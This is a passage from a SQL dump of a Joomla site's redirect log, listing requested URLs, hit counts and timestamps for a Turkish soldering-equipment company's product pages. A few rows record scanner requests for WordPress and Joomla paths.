00:00:00',301),(14854,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-text.php?checker-page',NULL,'3s-technologies.com.tr','',1,0,'2017-11-30 13:56:25','0000-00-00 00:00:00',301),(14855,'http://3s-technologies.com.tr/en/libraries/joomla/application/joomla-app.php?checker-page',NULL,'3s-technologies.com.tr','',1,0,'2017-11-30 13:56:41','0000-00-00 00:00:00',301),(14856,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,category_name/dirdesc/results,1-5',NULL,'','',3,0,'2017-11-30 14:11:39','0000-00-00 00:00:00',301),(14857,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın?language=tr-tr',NULL,'','',1,0,'2017-11-30 14:18:45','0000-00-00 00:00:00',301),(14858,'http://3s-technologies.com.tr/index.php/en/products/thru-hole',NULL,'','',22,0,'2017-11-30 14:53:15','0000-00-00 00:00:00',301),(14859,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-30 15:00:51','0000-00-00 00:00:00',301),(14860,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/trident-detail',NULL,'','',26,0,'2017-11-30 15:03:52','0000-00-00 00:00:00',301),(14861,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-30 15:05:00','0000-00-00 00:00:00',301),(14862,'http://www.3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-30 15:08:22','0000-00-00 00:00:00',301),(14863,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,category_name/dirdesc/results,1-50',NULL,'','',1,0,'2017-11-30 15:11:37','0000-00-00 00:00:00',301),(14864,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/275-k100-1mm-detail',NULL,'','',8,0,'2017-11-30 15:13:48','0000-00-00 00:00:00',301),(14865,'http://3s-technologies.com.tr/index.php/en/products/krem-lehim/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',8,0,'2017-11-30 15:28:21','0000-00-00 00:00:00',301),(14866,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/955lc-detail/askquestion?tmpl=component',NULL,'','',23,0,'2017-11-30 15:49:33','0000-00-00 00:00:00',301),(14867,'http://www.3s-technologies.com.tr/tr/urunler/jv131-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-11-30 16:00:38','0000-00-00 00:00:00',301),(14868,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/aqueous',NULL,'','',7,0,'2017-11-30 16:15:06','0000-00-00 00:00:00',301),(14869,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/product/resized/mx200_250x250.jpg',NULL,'','',2,0,'2017-11-30 16:29:35','0000-00-00 00:00:00',301),(14870,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name/dirdesc/results,1-10',NULL,'','',1,0,'2017-11-30 16:33:44','0000-00-00 00:00:00',301),(14871,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/by,category_name/dirdesc',NULL,'','',5,0,'2017-11-30 16:39:07','0000-00-00 00:00:00',301),(14872,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/github.com/joomla',NULL,'','',7,0,'2017-11-30 16:53:53','0000-00-00 00:00:00',301),(14873,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,category_name/dirdesc/results,1-20',NULL,'','',1,0,'2017-11-30 17:00:36','0000-00-00 00:00:00',301),(14874,'http://3s-technologies.com.tr/index.php/en/products/mx200lp-3-detail?tmpl=component&print=1',NULL,'','',10,0,'2017-11-30 17:00:40','0000-00-00 00:00:00',301),(14875,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name/dirdesc/results,1-40',NULL,'','',3,0,'2017-11-30 17:27:28','0000-00-00 00:00:00',301),(14876,'http://www.3s-technologies.com.tr/index.php/en/products/flux',NULL,'','',25,0,'2017-11-30 17:31:11','0000-00-00 00:00:00',301),(14877,'http://www.3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/by,mf_name/results,1-50',NULL,'','',2,0,'2017-11-30 17:32:50','0000-00-00 00:00:00',301),(14878,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2-el-makineler/by,mf_name?language=tr-tr',NULL,'','',25,0,'2017-11-30 17:53:48','0000-00-00 00:00:00',301),(14879,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/by,product_sku/results,1-5',NULL,'','',10,0,'2017-11-30 17:59:42','0000-00-00 00:00:00',301),(14880,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,category_name/dirdesc/results,1-10',NULL,'','',4,0,'2017-11-30 18:10:27','0000-00-00 00:00:00',301),(14881,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/by,category_name?language=tr-tr',NULL,'','',24,0,'2017-11-30 18:31:09','0000-00-00 00:00:00',301),(14882,'http://www.3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/by,product_name/dirdesc',NULL,'','',193,0,'2017-11-30 18:31:56','0000-00-00 00:00:00',301),(14883,'http://www.3s-technologies.com.tr/tr/urunler/rl132-detail?tmpl=component&print=1',NULL,'','',29,0,'2017-11-30 18:50:27','0000-00-00 00:00:00',301),(14884,'http://www.3s-technologies.com.tr/index.php/en/products/245-sn63pb37-0.4mm-29-detail?tmpl=component&print=1',NULL,'','',25,0,'2017-11-30 18:53:24','0000-00-00 00:00:00',301),(14885,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/le-40v-detail',NULL,'','',67,0,'2017-11-30 18:56:05','0000-00-00 00:00:00',301),(14886,'http://www.3s-technologies.com.tr/index.php/en/products/245-sn63pb37-0.8mm-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-11-30 19:02:20','0000-00-00 00:00:00',301),(14887,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim-31-32-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-11-30 19:55:57','0000-00-00 00:00:00',301),(14888,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/results,1-5?language=en-gb',NULL,'','',2,0,'2017-11-30 19:57:54','0000-00-00 00:00:00',301),(14889,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/screen-printer/by,product_name?language=tr-tr',NULL,'','',25,0,'2017-11-30 20:03:30','0000-00-00 00:00:00',301),(14890,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name/dirdesc/results,1-20',NULL,'','',3,0,'2017-11-30 20:14:01','0000-00-00 00:00:00',301),(14891,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın/dirdesc',NULL,'','',395,0,'2017-11-30 20:25:41','0000-00-00 00:00:00',301),(14892,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,product_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-30 20:50:05','0000-00-00 00:00:00',301),(14893,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',7,0,'2017-11-30 20:56:17','0000-00-00 00:00:00',301),(14894,'http://3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/245-sn63pb37-0.8mm-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-11-30 21:12:58','0000-00-00 00:00:00',301),(14895,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/by,mf_name/dirdesc?language=tr-tr',NULL,'','',14,0,'2017-11-30 21:25:27','0000-00-00 00:00:00',301),(14896,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name/dirdesc/results,1-100',NULL,'','',4,0,'2017-11-30 21:39:59','0000-00-00 00:00:00',301),(14897,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',23,0,'2017-11-30 21:49:21','0000-00-00 00:00:00',301),(14898,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/by,category_name/results,1-5',NULL,'','',3,0,'2017-11-30 21:50:44','0000-00-00 00:00:00',301),(14899,'http://3s-technologies.com.tr/index.php/en/homepage2/79-english-uk',NULL,'','',14,0,'2017-11-30 22:26:58','0000-00-00 00:00:00',301),(14900,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name/dirdesc/results,1-100',NULL,'','',4,0,'2017-11-30 22:33:43','0000-00-00 00:00:00',301),(14901,'http://3s-technologies.com.tr/index.php/tr/ueruenler/gf-12-hc-ht-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-11-30 22:43:42','0000-00-00 00:00:00',301),(14902,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturers/panasonic',NULL,'','',29,0,'2017-11-30 22:49:50','0000-00-00 00:00:00',301),(14903,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/275-k100-1.2mm-detail?tmpl=component&print=1',NULL,'','',25,0,'2017-11-30 22:52:15','0000-00-00 00:00:00',301),(14904,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,product_sku?language=en-gb',NULL,'','',1,0,'2017-11-30 22:52:23','0000-00-00 00:00:00',301),(14905,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/dalga-lehim/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-11-30 22:57:44','0000-00-00 00:00:00',301),(14906,'http://3s-technologies.com.tr/index.php/en/products/manufacturers/kester',NULL,'','',23,0,'2017-11-30 23:12:47','0000-00-00 00:00:00',301),(14907,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/by,ordering?language=en-gb',NULL,'','',22,0,'2017-11-30 23:17:32','0000-00-00 00:00:00',301),(14908,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-30 23:19:17','0000-00-00 00:00:00',301),(14909,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2017-11-30 23:41:54','0000-00-00 00:00:00',301),(14910,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/dirdesc/results,1-5',NULL,'','',4,0,'2017-11-30 23:48:56','0000-00-00 00:00:00',301),(14911,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/trident-detail?tmpl=component&print=1',NULL,'','',25,0,'2017-11-30 23:54:14','0000-00-00 00:00:00',301),(14912,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,product_sku?language=en-gb',NULL,'','',2,0,'2017-12-01 00:05:19','0000-00-00 00:00:00',301),(14913,'http://3s-technologies.com.tr/index.php/en/products/2.-el-makineler/rh2-20-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-12-01 00:29:49','0000-00-00 00:00:00',301),(14914,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.8mm-detail',NULL,'','',25,0,'2017-12-01 00:46:02','0000-00-00 00:00:00',301),(14915,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/product/resized/a_stencilwasher-eco_s_250x250.jpg',NULL,'','',1,0,'2017-12-01 00:47:36','0000-00-00 00:00:00',301),(14916,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/dirdesc/results,1-20',NULL,'','',4,0,'2017-12-01 00:53:25','0000-00-00 00:00:00',301),(14917,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/dirdesc/results,1-50',NULL,'','',2,0,'2017-12-01 01:09:32','0000-00-00 00:00:00',301),(14918,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar',NULL,'','',44,0,'2017-12-01 01:25:40','0000-00-00 00:00:00',301),(14919,'http://3s-technologies.com.tr/tr/urunler/2-el-makineler/rh6-detail/askquestion?tmpl=component',NULL,'','',16,0,'2017-12-01 01:38:21','0000-00-00 00:00:00',301),(14920,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/dirdesc?language=tr-tr',NULL,'','',2,0,'2017-12-01 02:01:41','0000-00-00 00:00:00',301),(14921,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/product/resized/rl132_250x250.jpg',NULL,'','',2,0,'2017-12-01 02:02:00','0000-00-00 00:00:00',301),(14922,'http://3s-technologies.com.tr/index.php/en/products/rh2-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-12-01 02:12:23','0000-00-00 00:00:00',301),(14923,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/parks-home',NULL,'','',2,0,'2017-12-01 02:14:10','0000-00-00 00:00:00',301),(14924,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-12-01 02:17:18','0000-00-00 00:00:00',301),(14925,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/dirdesc/results,1-40',NULL,'','',3,0,'2017-12-01 02:32:14','0000-00-00 00:00:00',301),(14926,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/275-k100-1mm-detail',NULL,'','',7,0,'2017-12-01 02:40:39','0000-00-00 00:00:00',301),(14927,'http://www.3s-technologies.com.tr/tr/urunler/av132-detail?tmpl=component&print=1',NULL,'','',25,0,'2017-12-01 03:08:11','0000-00-00 00:00:00',301),(14928,'http://3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim-31-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-12-01 03:21:10','0000-00-00 00:00:00',301),(14929,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/screen-printer/by,product_name?language=tr-tr',NULL,'','',25,0,'2017-12-01 03:42:21','0000-00-00 00:00:00',301),(14930,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/by,category_name/dirdesc?language=en-gb',NULL,'','',24,0,'2017-12-01 03:42:41','0000-00-00 00:00:00',301),(14931,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,product_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-12-01 03:45:12','0000-00-00 00:00:00',301),(14932,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/dirdesc/results,1-10',NULL,'','',5,0,'2017-12-01 04:15:05','0000-00-00 00:00:00',301),(14933,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/by,category_name/dirdesc?language=tr-tr',NULL,'','',24,0,'2017-12-01 04:42:41','0000-00-00 00:00:00',301),(14934,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim/245-k100-28-29-detail',NULL,'','',18,0,'2017-12-01 04:43:16','0000-00-00 00:00:00',301),(14935,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,pc.ordering,product_name',NULL,'','',16,0,'2017-12-01 04:47:14','0000-00-00 00:00:00',301),(14936,'http://www.3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,mf_name?language=en-gb',NULL,'','',1,0,'2017-12-01 04:56:30','0000-00-00 00:00:00',301),(14937,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/dirdesc/results,1-20',NULL,'','',6,0,'2017-12-01 05:25:48','0000-00-00 00:00:00',301),(14938,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/dalga-lehim/by,product_name/dirdesc?language=tr-tr',NULL,'','',24,0,'2017-12-01 05:34:48','0000-00-00 00:00:00',301),(14939,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/955lc-detail/askquestion?tmpl=component',NULL,'','',23,0,'2017-12-01 06:12:15','0000-00-00 00:00:00',301),(14940,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,pc.ordering,product_name/dirdesc/results,1-10',NULL,'','',5,0,'2017-12-01 06:42:57','0000-00-00 00:00:00',301),(14941,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/dalga-lehim/by,product_name?language=tr-tr',NULL,'','',14,0,'2017-12-01 07:01:28','0000-00-00 00:00:00',301),(14942,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/dirdesc/results,1-10',NULL,'','',1,0,'2017-12-01 07:08:40','0000-00-00 00:00:00',301),(14943,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,pc.ordering,product_name/dirdesc/results,1-20',NULL,'','',3,0,'2017-12-01 07:27:56','0000-00-00 00:00:00',301),(14944,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/spr-45va_250x250.gif',NULL,'','',1,0,'2017-12-01 07:29:20','0000-00-00 00:00:00',301),(14945,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/product/resized/avb_12_250x250.jpg',NULL,'','',1,0,'2017-12-01 07:36:00','0000-00-00 00:00:00',301),(14946,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/by,product_name?language=tr-tr',NULL,'','',25,0,'2017-12-01 07:36:02','0000-00-00 00:00:00',301),(14947,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/asp-300-detail/askquestion?tmpl=component',NULL,'','',28,0,'2017-12-01 07:39:02','0000-00-00 00:00:00',301),(14948,'http://3s-technologies.com.tr/en/products/bölgesel-lehimleme/ess-310-detail/askquestion?tmpl=component',NULL,'','',211,0,'2017-12-01 07:42:21','0000-00-00 00:00:00',301),(14949,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku?language=tr-tr',NULL,'','',1,0,'2017-12-01 07:48:17','0000-00-00 00:00:00',301),(14950,'http://3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-12-01 08:06:51','0000-00-00 00:00:00',301),(14951,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,product_sku?language=tr-tr',NULL,'','',1,0,'2017-12-01 08:37:39','0000-00-00 00:00:00',301),(14952,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/dalga-lehim/by,category_name/dirdesc?language=tr-tr',NULL,'','',23,0,'2017-12-01 08:47:13','0000-00-00 00:00:00',301),(14953,'http://www.3s-technologies.com.tr/tr/images/pdf/ls_automated_pick_?_place_with_vision.pdf',NULL,'','',24,0,'2017-12-01 08:56:26','0000-00-00 00:00:00',301),(14954,'http://www.3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/ess-310-24-detail/askquestion?tmpl=component',NULL,'','',221,0,'2017-12-01 09:03:13','0000-00-00 00:00:00',301),(14955,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,pc.ordering,product_name/dirdesc/results,1-40',NULL,'','',1,0,'2017-12-01 09:23:40','0000-00-00 00:00:00',301),(14956,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/spartan-8s-8d-44-detail?tmpl=component&print=1',NULL,'','',22,0,'2017-12-01 09:29:30','0000-00-00 00:00:00',301),(14957,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/dirdesc/results,1-20',NULL,'','',4,0,'2017-12-01 09:30:04','0000-00-00 00:00:00',301),(14958,'http://3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/krem-lehim-31-detail',NULL,'','',21,0,'2017-12-01 09:33:15','0000-00-00 00:00:00',301),(14959,'http://www.3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,product_name?language=en-gb',NULL,'','',1,0,'2017-12-01 09:37:02','0000-00-00 00:00:00',301),(14960,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/955lc-detail',NULL,'','',21,0,'2017-12-01 09:40:41','0000-00-00 00:00:00',301),(14961,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-01 09:48:16','0000-00-00 00:00:00',301),(14962,'http://www.3s-technologies.com.tr/en/products/smd-fä±rä±n/by,ordering',NULL,'','',1,0,'2017-12-01 10:07:08','0000-00-00 00:00:00',301),(14963,'http://3s-technologies.com.tr/index.php/en/products/thru-hole/by,category_name/dirdesc?language=en-gb',NULL,'','',8,0,'2017-12-01 10:49:30','0000-00-00 00:00:00',301),(14964,'http://www.3s-technologies.com.tr/index.php/en/products/screen-printer/by,mf_name?language=en-gb',NULL,'','',25,0,'2017-12-01 11:11:40','0000-00-00 00:00:00',301),(14965,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,pc.ordering,product_name/dirdesc/results,1-100',NULL,'','',3,0,'2017-12-01 11:12:56','0000-00-00 00:00:00',301),(14966,'http://3s-technologies.com.tr/tr/urunler/2-el-makineler/avb-detail',NULL,'','',20,0,'2017-12-01 11:21:18','0000-00-00 00:00:00',301),(14967,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.6mm-detail',NULL,'','',26,0,'2017-12-01 11:21:21','0000-00-00 00:00:00',301),(14968,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,mf_name?language=en-gb',NULL,'','',1,0,'2017-12-01 11:24:06','0000-00-00 00:00:00',301),(14969,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,ordering?language=tr-tr',NULL,'','',1,0,'2017-12-01 11:33:59','0000-00-00 00:00:00',301),(14970,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,ordering?language=en-gb',NULL,'','',1,0,'2017-12-01 11:37:28','0000-00-00 00:00:00',301),(14971,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,product_name/results,1-5',NULL,'','',2,0,'2017-12-01 11:38:39','0000-00-00 00:00:00',301),(14972,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/screen-printer/by,`p`.product_sku?language=tr-tr',NULL,'','',24,0,'2017-12-01 11:43:23','0000-00-00 00:00:00',301),(14973,'http://3s-technologies.com.tr/tr/downloader',NULL,'','',18,0,'2017-12-01 11:50:36','0000-00-00 00:00:00',301),(14974,'http://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/by,product_sku',NULL,'','',266,0,'2017-12-01 11:51:30','0000-00-00 00:00:00',301),(14975,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,mf_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-12-01 12:04:52','0000-00-00 00:00:00',301),(14976,'http://www.3s-technologies.com.tr/en/wp-content/plugins/wp-symposium/readme.txt',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/wp-symposium/readme.txt','',6,0,'2017-12-01 12:12:58','0000-00-00 00:00:00',301),(14977,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,pc.ordering,product_name',NULL,'','',1,0,'2017-12-01 13:09:08','0000-00-00 00:00:00',301),(14978,'http://3s-technologies.com.tr/en/products/smd-ultra-hız/npm-detail/askquestion?tmpl=component',NULL,'','',215,0,'2017-12-01 13:22:23','0000-00-00 00:00:00',301),(14979,'http://3s-technologies.com.tr/en/welcome.html',NULL,'','',17,0,'2017-12-01 13:35:52','0000-00-00 00:00:00',301),(14980,'http://3s-technologies.com.tr/en/?option=com_content&view=category&layout=blog&id=1&itemid=50',NULL,'','',12,0,'2017-12-01 13:36:16','0000-00-00 00:00:00',301),(14981,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın/by,pc.ordering,product_name',NULL,'','',579,0,'2017-12-01 13:38:12','0000-00-00 00:00:00',301),(14982,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',541,0,'2017-12-01 13:38:40','0000-00-00 00:00:00',301),(14983,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/by,mf_name',NULL,'','',581,0,'2017-12-01 13:38:49','0000-00-00 00:00:00',301),(14984,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',532,0,'2017-12-01 13:38:52','0000-00-00 00:00:00',301),(14985,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/by,pc.ordering,product_name',NULL,'','',533,0,'2017-12-01 13:39:06','0000-00-00 00:00:00',301),(14986,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/by,pc.ordering,product_name/dirdesc',NULL,'','',526,0,'2017-12-01 13:39:09','0000-00-00 00:00:00',301),(14987,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_name',NULL,'','',567,0,'2017-12-01 13:39:15','0000-00-00 00:00:00',301),(14988,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',520,0,'2017-12-01 13:39:16','0000-00-00 00:00:00',301),(14989,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_sku',NULL,'','',548,0,'2017-12-01 13:39:22','0000-00-00 00:00:00',301),(14990,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',500,0,'2017-12-01 13:39:51','0000-00-00 00:00:00',301),(14991,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',492,0,'2017-12-01 13:39:59','0000-00-00 00:00:00',301),(14992,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,pc.ordering,product_name',NULL,'','',493,0,'2017-12-01 13:40:24','0000-00-00 00:00:00',301),(14993,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,pc.ordering,product_name/dirdesc',NULL,'','',505,0,'2017-12-01 13:40:26','0000-00-00 00:00:00',301),(14994,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,product_name',NULL,'','',528,0,'2017-12-01 13:40:33','0000-00-00 00:00:00',301),(14995,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',483,0,'2017-12-01 13:40:39','0000-00-00 00:00:00',301),(14996,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,product_sku',NULL,'','',517,0,'2017-12-01 13:40:46','0000-00-00 00:00:00',301),(14997,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/dirdesc',NULL,'','',545,0,'2017-12-01 13:40:53','0000-00-00 00:00:00',301),(14998,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',518,0,'2017-12-01 13:41:01','0000-00-00 00:00:00',301),(14999,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',508,0,'2017-12-01 13:41:02','0000-00-00 00:00:00',301),(15000,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name',NULL,'','',539,0,'2017-12-01 13:41:13','0000-00-00 00:00:00',301),(15001,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',518,0,'2017-12-01 13:41:15','0000-00-00 00:00:00',301),(15002,'http://www.3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-01 13:50:17','0000-00-00 00:00:00',301),(15003,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/by,mf_name/dirdesc?language=tr-tr',NULL,'','',25,0,'2017-12-01 13:55:40','0000-00-00 00:00:00',301),(15004,'http://www.3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/results,1-20',NULL,'','',10,0,'2017-12-01 